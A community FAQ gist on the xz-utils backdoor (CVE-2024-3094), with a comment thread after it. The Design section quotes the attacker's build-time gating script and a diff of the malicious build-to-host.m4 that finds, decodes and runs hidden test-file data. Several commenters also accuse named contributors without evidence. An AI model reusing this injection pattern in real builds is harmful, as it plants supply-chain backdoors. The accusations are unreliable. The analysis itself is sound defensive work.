@thesamesam
Last active May 16, 2024 19:46
FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and believed to be accurate, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that provides lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

This is not scaremongering, but it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.
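For quick triage, the decision above boils down to a version check. A minimal sketch (the helper function name is made up for illustration; the version strings 5.6.0/5.6.1 are the ones named in this document):

```shell
#!/bin/sh
# Hypothetical triage helper: does a given xz/liblzma version string
# match one of the known-backdoored releases?
xz_version_is_backdoored() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;  # known-bad releases
        *)           return 1 ;;
    esac
}

# In practice you would feed it the installed version, e.g.:
#   ver=$(xz --version | sed -n 's/^xz (XZ Utils) //p')
for ver in 5.4.6 5.6.0 5.6.1; do
    if xz_version_is_backdoored "$ver"; then
        echo "$ver: known-backdoored release - update now"
    else
        echo "$ver: not a known-backdoored release"
    fi
done
```

Note that a version outside 5.6.0/5.6.1 is not a guarantee of safety on its own; distributions have shipped fixed packages under distro-specific version strings, so follow your distro's advisory.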

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too.
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different from the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.
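Putting those fragments together, the gating amounts to the sketch below. This is an illustrative reconstruction, not the attacker's actual code: the function name and argument passing are made up, and the original simply exits 0 on any mismatch so the build proceeds with nothing injected.

```shell
#!/bin/sh
# Illustrative reconstruction of the gating checks described above.
# Returns 0 ("inject") only when every condition holds.
should_inject() {
    build="$1"      # autoconf build triple, e.g. x86_64-pc-linux-gnu
    gcc_flag="$2"   # "yes" when $GCC=yes and $CC=gcc
    ld_version="$3" # output of "$LD -v"
    packaging="$4"  # "deb", "rpm", or anything else

    # Target must be x86_64 and glibc-based Linux (linux-gnu).
    echo "$build" | grep -Eq "^x86_64"     || return 1
    echo "$build" | grep -Eq "linux-gnu$"  || return 1
    # Toolchain must be GCC with GNU ld.
    [ "$gcc_flag" = "yes" ]                || return 1
    echo "$ld_version" | grep -qs 'GNU ld' || return 1
    # Must be a Debian (debian/rules) or RPM (RPM_ARCH=x86_64) build.
    [ "$packaging" = "deb" ] || [ "$packaging" = "rpm" ] || return 1
    return 0
}

should_inject "x86_64-pc-linux-gnu" yes "GNU ld (GNU Binutils) 2.41" deb \
    && echo "all conditions met: this build would be backdoored"
should_inject "aarch64-unknown-linux-gnu" yes "GNU ld" deb \
    || echo "mismatch: the real script exits quietly, leaving a clean build"
```

The exit-0-on-mismatch design is what made the backdoor quiet: on any non-targeted system, the build completes normally with nothing to notice.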

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
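Two additions in this diff can be demonstrated in isolation: gl_path_map is a simple character swap (tab↔space, -↔_) used to deobfuscate strings, and gl_am_configmake locates the crafted test file by grepping the tree for content ending in a ####xxxxx#### marker. A small sketch using a throwaway directory (the file names here are illustrative):

```shell
#!/bin/sh
# 1) The gl_path_map step: tr swaps tab<->space and '-'<->'_'.
path_map() { tr "\t \-_" " \t_\-"; }
printf 'hello-world_test\n' | path_map
# -> hello_world-test

# 2) The gl_am_configmake step: find any file whose contents end with
#    four '#', five alphanumerics, four '#'. This is how the build
#    locates the crafted "test data" carrying the next stage.
dir=$(mktemp -d)
printf 'opaque test data\n####Hello####\n' > "$dir/bad-crafted.xz"
printf 'an ordinary file\n' > "$dir/README"
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" "$dir"
# prints only the path of the crafted file
rm -rf "$dir"
```

Both pieces look innocuous on their own; the point is that neither the marker file nor the tr-mangled strings mean anything until this m4 glue stitches them together at configure time.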

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is just unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
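Given the sshd → libsystemd → liblzma chain described above, one widely circulated triage step was simply to check whether liblzma is linked into your sshd at all. A hedged sketch (ldd output is distro-dependent, and liblzma being present does not by itself prove the payload is active):

```shell
#!/bin/sh
# Does ldd-style output mention liblzma? On affected distros the chain
# is sshd -> libsystemd -> liblzma (sshd itself never asks for xz).
mentions_liblzma() { grep -q 'liblzma'; }

# Real usage (commented out; result depends on your distro's patches):
#   ldd "$(command -v sshd)" | mentions_liblzma && echo "liblzma is mapped in"

# Demonstration against a canned ldd-style line:
printf '\tliblzma.so.5 => /usr/lib/liblzma.so.5\n' | mentions_liblzma \
    && echo "liblzma is mapped in: now check its version"
```

If liblzma does show up, the next question is whether the installed version is one of the backdoored releases; if it doesn't, this particular attack path into sshd is closed on that machine.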

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a stray . in the CMake check for landlock sandboxing support. This caused the check to always fail, so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either directly, or because changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such; please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord, but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything other than wait for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • take other steps to infest the system (like adding users, authorized_keys, etc.), or whether it can be said with certainty that it didn't
      • whether other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running or at least not publicly accessible (e.g. because it was behind a firewall, NAT, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@christoofar
Copy link

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog, and made one post, about his excitement of Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and written one test to just pass a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff test bloat oh cool no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork) then called Jia and ask him to pull them down so Jia can then pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo I would have left my tests in my fork and cherry pick out of that branch what I want to send to CPython if I had a board in my lap and wanted Jia's change so I can make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.

@0x1eef
Copy link

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell
Copy link

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface filtering IPs is not really effective.

Reducing the libraries you link is ... for example don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd, this is why "libelogind0" exists at all, and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd
Copy link

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

@duracell
Copy link

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space
  1. It says “harder”! 2. 17 YEARS have gone by, and where is the proof of the 2nd point?

And this is just a presentation.
You should look at the current stages of public scanning or even paper from akamai.
The truth is: Scanning is a lot, lot harder and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more.
Of course, if it's a targeted attack that uses publicly known IP addresses, then it's not that much harder than IPv4. But for exploits in general, widespread IPv6 can help to slow down mass attacks.

@orangepizza
Copy link

orangepizza commented Apr 4, 2024 via email

@bogd
Copy link

bogd commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

I was not replying to you, but to a different message that was quoting you (and in turn it was referring to a message from @christoofar ). Yes, I agree with you on the fail2ban part - it will not protect you from such an exploit. And probably none of the other mentioned workarounds will protect you against an application-level exploit/backdoor.

As for the second part, you missed the point entirely. :) . Yes, IPv6 scanning is harder (nobody ever contested that), but that doesn't mean that this can be used as a "security mechanism". That was what the "ha ha" on the slide was about.

Your first link seems to only talk about IPv4 scanning (and I did not see any relevant statistics on that page).

where is the proof about the 2nd point?

Probably waiting (together with the rest of us) for large-scale IPv6 adoption :p . Even the paper you linked says that:

"It may well be that the relative rarity of largescale IPv6 scans is simply the result of the inability to “cheaply” find destination addresses to probe. However, we argue this situation may quickly change if and when targetable IPv6 addresses become more available, be it due to advances in target generation algorithms, or exposure of addresses, e.g., via peer-to-peer applications or other rendezvous mechanisms employed by future applications"

Anyway, this is not the place for this conversation. Let us get back to the interesting part, the current exploit. :)

@christoofar
Copy link

christoofar commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

I understand that. But the IPv4 universe is still super-fucked. Live targets compacted into a small universe white-hot with scanners. You still have to break defaults when hosting on IPv6 in the lower-temperature environment.

The shitshops/skids would be left having to use advanced techniques and rely on fewer devs and information (analyzing traffic, ingesting pilfered web logs, etc) to harvest target lists. There's just no reason, no reason at all, to put sshd hosted on defaults on to IPv4, which is what most people are doing. Every cloud provider is doing it. It's crazytown.

And with xz we have now understood, very well, the issue of hot-loading, which tells you how good the code of OpenSSH has become, because that was a technique few people thought feasible in a closed environment. And systemd is reducing the temperature even more with dlopen() (though it doesn't solve it).

@christoofar
Copy link

christoofar commented Apr 4, 2024

Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

The cheapest thing to do is to go after caches of weblogs to collect/guess pools where there are clusters of hosts because Provider X misconfigured and handed out clients a small range. Like astronomers who write image filter code to sort out background stars looking for fuzzy balls that are galaxies or nebulae.

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Everyone has an Internet device talking a lot more on v6 than on v4. It's probably your phone. It's your Starlink router. The future is now. Get sshd off the IPv4 network. Just do it.

If you can't/won't, then why not shove it behind OpenVPN? Or set up port knocking? Or, as I mentioned... take a look at Yggdrasil which gives you a virtual IPv6 encrypted network with minimal fuss with way less setup headache?

@christoofar
Copy link

christoofar commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

Hot-loading is when libA which is doing just fine in production when loaded on to executable hosts, now has a change introduced because libB is going to be hot-loaded (LD_PRELOAD or, as we've seen it's systemd doing it) to make the code in libB get into memory and its initters get called, wanting to change the environment/state/data that libA usually runs under.

That's why the dlopen() changes to systemd matter.

How did liblzma get hotloaded? systemd did that (because journald), and also because OpenSSH did not want to bring in libsystemd to support its UNIX socket notify feature to signal readiness-to-serve. They have to support more OSes than just Linux (primarily the BSDs). Distros were taking patches to OpenSSH to get sshd to use this feature. THAT step matters because that is what created the hot-loading situation!

But any software, really, is vulnerable to hotloading. You have one thing that runs as root and pulls from an unwatched patching cycle, it is an invitation to hot-load. It doesn't have to be systemd as the root launcher, it can happen inside the ecosphere of some package you run, too.

Laughing and pointing fingers like a dumbshit saying "huhuhuh I run ${FAVORITE_OS} not a problem there"... yeah no ALL software is vuln to this.

@duracell
Copy link

duracell commented Apr 4, 2024

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh.
You connect to ssh with a specific key which includes the malicious commands. Without the ssh connection this exploit wouldn't work.
It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

@christoofar
Copy link

christoofar commented Apr 4, 2024

I should note: there are some software landscapes where hotloading is the norm because that's just the way things go. The Asterisk project is a great example. Plugins are written as C modules/patches, so it's no surprise that you might need X feature ("I wanna write something that injects custom SIP headers") and you need a dependency elsewhere but you don't want to touch the PJSIP module itself, or you reduce your change to a small nugget to keep up with updates to PJSIP. (Edit: you set the module loading order to your need and then launch with LD_PRELOAD to force your deps in, then your module/patch can do whatever it needs to do to PJSIP. This is just how things work over there.)

In closed-source vendor land that behavior is everywhere.

Dependency hijacking is a thing .NET people have been dealing with for eons now and they are further ahead (lib signing, centralized and well-understood assembly loading behavior, etc). But, again... everything everywhere is subject to hotloading. Just like injected static includes creeping into an unprotected repo, it can be dynamic, too.

@christoofar
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh. You connect to ssh with a specific key which includes the malicious commands. Without the ssh connection this exploit wouldn't work. It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

I'm going to target your dishwasher. Your dishwasher is the vulnerable component.

@dnorthup-ums
Copy link

dnorthup-ums commented Apr 4, 2024

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

@christoofar
Copy link

christoofar commented Apr 4, 2024

By the way, I have not proven our enthusiastic CPython user is guilty beyond a reasonable doubt of being Team Jia, but this is the most stinky fish of all the associated cross-committers looking to push up Jia's changes.

It's not that Mr. CPython found a 0day in decrypt/encrypt... my suspicion is the audience that Mr. CPython would have created with his PR to CPython. The test he submitted cannot be run unless you force up the dependency, because in the binding code the feature flag is tied to the release level of liblzma. Tinkerboard people tend to be IT professionals with day jobs in corporate land. I don't know anyone around me in my inner circle, that is a nerd, who doesn't have a tinkerboard. Granted, not RISCV... but for RISCV I'm going to assume the audience is the same, plus more avid tinkerboard project users.

And even if Mr. CPython is completely innocent here... the adoption to push up is there, and when CPython lands for all chipsets and OS platforms everyone's Python code using lzma whether they know it or not will host Jia. Jia now has a worldwide entrypoint to ship to everything, everywhere, even in locked-down shit like QNX if that OS moves up because CPython did.

So... the panicky headlines from the tech press are, to some degree, justified.

Mr. CPython started a promo website all-excited about his interest in the liblzma memory allocator (that is not a memory allocator). And well, I want to testbed the CPython PR that was kicked out against Jia's RISCV feature enhancement. How much of a performance gain is this?

So I have ordered a RISCV tinkerboard off of Amazon.

@fungilife
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.
If you want to be precise, ssh was the vulnerable component

I'm going to target your ..... is the vulnerable component.

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem. They will diffuse and divert the discussion to produce "doubt", "reasonable doubt", and the entire subject will be shoved under the carpet in a short while.

The fact that tests were done on a compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found, seems to have gone over everyone's head.

Meanwhile, everyone is talking about xz/lzma and distros are rebuilding packages, but zstd is still being built (or hasn't been rebuilt since 3/29) from a preconfigured GitHub tarball with lzma enabled (or is it not everyone doing this?).

You wanted automation and less sysadmin work, you looked down on custom scripts to set up services... and here it came. If you leave honey out, the bees and the ants will come.

@ostrosablin

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Not only is IPv6 a major failure (its adoption is still low), but because of this it hardly gets tested in many "IPv6-ready" products, if at all.

IPv6 is usable only in corporate environments managed by a team of experienced network engineers. For most end users, it doesn't solve any real problems. In fact, it generates many more security concerns. Generally, enabling IPv6 would expose the entire network to the public internet. What makes it worse, some cheaper/older consumer routers don't even provide any mechanism to set up IPv6 connection filtering in their stock firmware, and will even happily expose their control panel to the public internet.

So, unless you really know what you're doing, IPv4 is the only way to go, because being behind NAT makes accepting connections opt-in by default. On the other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately, to the public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

@duracell

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

The device which does NAT for IPv4 is, in all cases I know of, also the device that does the filtering for IPv6, and by default on all consumer products it does not allow any incoming connection requests. So you have the same firewall security as with NAT, but without port translation and its other problems.

@Daniel15

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums

@sectosec

The serious part is that the guy named Neustradamus also pressured to push the liblzma update to 5.6.0; check microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
